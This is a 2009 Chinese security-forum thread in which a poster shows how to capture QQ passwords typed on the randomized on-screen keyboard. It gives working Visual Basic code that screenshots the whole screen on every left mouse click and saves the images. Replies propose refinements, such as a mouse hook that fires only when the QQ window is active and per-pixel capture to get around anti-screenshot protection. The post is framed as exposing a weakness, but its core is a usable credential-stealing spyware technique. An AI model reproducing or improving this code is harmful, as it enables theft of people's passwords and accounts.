[原创]（谢谢斑竹邀请码已发）看来QQ的密码保护还不是无懈可击的-付费问答-看雪-安全社区|安全招聘|kanxue.com

[旧帖] [原创]（谢谢斑竹邀请码已发）看来QQ的密码保护还不是无懈可击的 0.00雪花

发表于: 2009-8-20 08:32 1732

[旧帖] [原创]（谢谢斑竹邀请码已发）看来QQ的密码保护还不是无懈可击的 0.00雪花

jcvb

2009-8-20 08:32

1732

N久以前研究过盗号的程序，做过一个钩子，在QQ上做试验，没想到截过来的都是乱七八糟的东西。然后又用GetWindowText想直接从密码框里捞密码，结果又是乱的。。。看来腾讯对此还是下了功夫的。而且还加了另一道防线——屏幕小键盘。仔细研究一下，小键盘按键的排列还是随机的，看起来很安全。不过实际真是这样吗？这道“防线”是防住了盗号者的来犯，还是给了他们一个捷径呢？

今天我想起用屏幕截图的方式盗Q密，开始还以为腾讯会对此做出防备，后来又想腾讯再强也不会强到这种地步。于是就干起来。干了半个小时，看来腾讯真还是有疏忽。上几张图：

VB源码：

Private Declare Function BitBlt Lib "gdi32" _

               (ByVal hDestDC As Long, ByVal x As Long, ByVal y As Long, _

               ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, _

               ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long

Private Declare Function GetDC Lib "user32" (ByVal hWnd As Long) As Long

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Const SRCCOPY = &HCC0020Private Sub Form_Load()

Picture1.AutoRedraw = True

Picture1.Height = Screen.Height: Picture1.Width = Screen.Width

End Sub

Private Sub Timer1_Timer()

If GetAsyncKeyState(1) = -32767 Then

  Static I

  I = I + 1

  BitBlt Picture1.hDC, 0, 0, Screen.Width, Screen.Height, GetDC(0), 0, 0, SRCCOPY

  SavePicture Picture1.Image, "D:\pic\" & I & ".jpeg"

End If

End Sub

看来在腾讯修漏洞之前，还是老老实实用大键盘输吧，谁知道哪天有人把你号盗走？

[培训]《安卓高级研修班(网课)》月薪三万计划，掌握调试、分析还原ollvm、vmp的方法，定制art虚拟机自动化脱壳的方法

上传的附件：

1.jpeg （73.26kb，231次下载）
2.jpg （73.90kb，232次下载）
3.jpg （73.85kb，234次下载）

收藏・1

免费・0

支持

最新回复 (14)
b23526 雪币： 4580 活跃值： (992) 能力值： ( LV4，RANK：50 ) 在线值：发帖 351 回帖 1832 粉丝 4 关注私信	b23526 2 楼图挂了,楼主 2009-8-20 08:43 0
iverson 雪币： 172 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 33 粉丝 0 关注私信	iverson 3 楼 LZ，QQ空间里的图是不可以外链的呀~~ 2009-8-20 08:49 0
rsbar 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	rsbar 4 楼 QQ空间百度空间某些博客图都不能外链请点击右键属性查看地址然后IE打开... 2009-8-20 08:54 0
anbn 雪币： 164 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 192 粉丝 0 关注私信	anbn 5 楼 4楼的真巧~ 呵呵还是弄个有效的链接吧 2009-8-20 09:07 0
jcvb 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 29 粉丝 0 关注私信	jcvb 6 楼 OK 了图用附件放上了 2009-8-20 10:04 0
zhdooo 雪币： 86 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	zhdooo 7 楼看到图另外，呵呵呵 2009-8-20 11:03 0
wzgangwzg 雪币： 5 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 91 粉丝 0 关注私信	wzgangwzg 8 楼道高一尺，魔高一丈！！！ 2009-8-20 12:32 0
jcvb 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 29 粉丝 0 关注私信	jcvb 9 楼呵呵以后大家可要小心哦 2009-8-20 12:55 0
moonife 雪币： 370 活跃值： (52) 能力值： ( LV13，RANK：350 ) 在线值：发帖 133 回帖 852 粉丝 5 关注私信	moonife 8 10 楼 LZ暴力啊依靠timer 准确性可能有问题实际意义不大但不实为一种思路玩玩就好不要干坏事哦 2009-8-20 14:25 0
jcvb 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 29 粉丝 0 关注私信	jcvb 11 楼不过Timer.Interval=1就绝对可以每次都拦到的。能给一个邀请码吗？斑竹谢谢哈。 2009-8-20 15:11 0
adxy 雪币： 231 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 18 粉丝 0 关注私信	adxy 12 楼卡巴的软键盘可以阻止截屏 2009-8-20 15:48 0
jcvb 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 29 粉丝 0 关注私信	jcvb 13 楼阻止截屏？那不知道可不可以用GetPixel。一个个点拼成图。如果它连这个也拦了话。。。。 2009-8-20 15:54 0
eyascn 雪币： 57 活跃值： (50) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 9 粉丝 0 关注私信	eyascn 14 楼用timer来截图存在问题，可以挂个钩子，如果当前窗体是qq2009,捕获鼠标的LeftButton事件来截图 2009-8-20 16:08 0
jcvb 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 29 粉丝 0 关注私信	jcvb 15 楼大家理解错了吧。我的TIMER就是配合getasynckeystate函数来达到鼠标钩子的效果的。我不可能一秒截1000张图。。。。。 2009-8-20 16:48 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

jcvb

发帖

回帖

RANK

关注

私信

他的文章

[原创]（谢谢斑竹邀请码已发）看来QQ的密码保护还不是无懈可击的 1733

关于我们

联系我们

企业服务

看雪公众号

最新回复 (14)
b23526 雪币： 4580 活跃值： (992) 能力值： ( LV4，RANK：50 ) 在线值：发帖 351 回帖 1832 粉丝 4 关注私信	b23526 2 楼图挂了,楼主 2009-8-20 08:43 0
iverson 雪币： 172 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 33 粉丝 0 关注私信	iverson 3 楼 LZ，QQ空间里的图是不可以外链的呀~~ 2009-8-20 08:49 0
rsbar 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	rsbar 4 楼 QQ空间百度空间某些博客图都不能外链请点击右键属性查看地址然后IE打开... 2009-8-20 08:54 0
anbn 雪币： 164 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 192 粉丝 0 关注私信	anbn 5 楼 4楼的真巧~ 呵呵还是弄个有效的链接吧 2009-8-20 09:07 0
jcvb 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 29 粉丝 0 关注私信	jcvb 6 楼 OK 了图用附件放上了 2009-8-20 10:04 0
zhdooo 雪币： 86 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	zhdooo 7 楼看到图另外，呵呵呵 2009-8-20 11:03 0
wzgangwzg 雪币： 5 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 91 粉丝 0 关注私信	wzgangwzg 8 楼道高一尺，魔高一丈！！！ 2009-8-20 12:32 0
jcvb 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 29 粉丝 0 关注私信	jcvb 9 楼呵呵以后大家可要小心哦 2009-8-20 12:55 0
moonife 雪币： 370 活跃值： (52) 能力值： ( LV13，RANK：350 ) 在线值：发帖 133 回帖 852 粉丝 5 关注私信	moonife 8 10 楼 LZ暴力啊依靠timer 准确性可能有问题实际意义不大但不实为一种思路玩玩就好不要干坏事哦 2009-8-20 14:25 0
jcvb 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 29 粉丝 0 关注私信	jcvb 11 楼不过Timer.Interval=1就绝对可以每次都拦到的。能给一个邀请码吗？斑竹谢谢哈。 2009-8-20 15:11 0
adxy 雪币： 231 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 18 粉丝 0 关注私信	adxy 12 楼卡巴的软键盘可以阻止截屏 2009-8-20 15:48 0
jcvb 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 29 粉丝 0 关注私信	jcvb 13 楼阻止截屏？那不知道可不可以用GetPixel。一个个点拼成图。如果它连这个也拦了话。。。。 2009-8-20 15:54 0
eyascn 雪币： 57 活跃值： (50) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 9 粉丝 0 关注私信	eyascn 14 楼用timer来截图存在问题，可以挂个钩子，如果当前窗体是qq2009,捕获鼠标的LeftButton事件来截图 2009-8-20 16:08 0
jcvb 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 29 粉丝 0 关注私信	jcvb 15 楼大家理解错了吧。我的TIMER就是配合getasynckeystate函数来达到鼠标钩子的效果的。我不可能一秒截1000张图。。。。。 2009-8-20 16:48 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复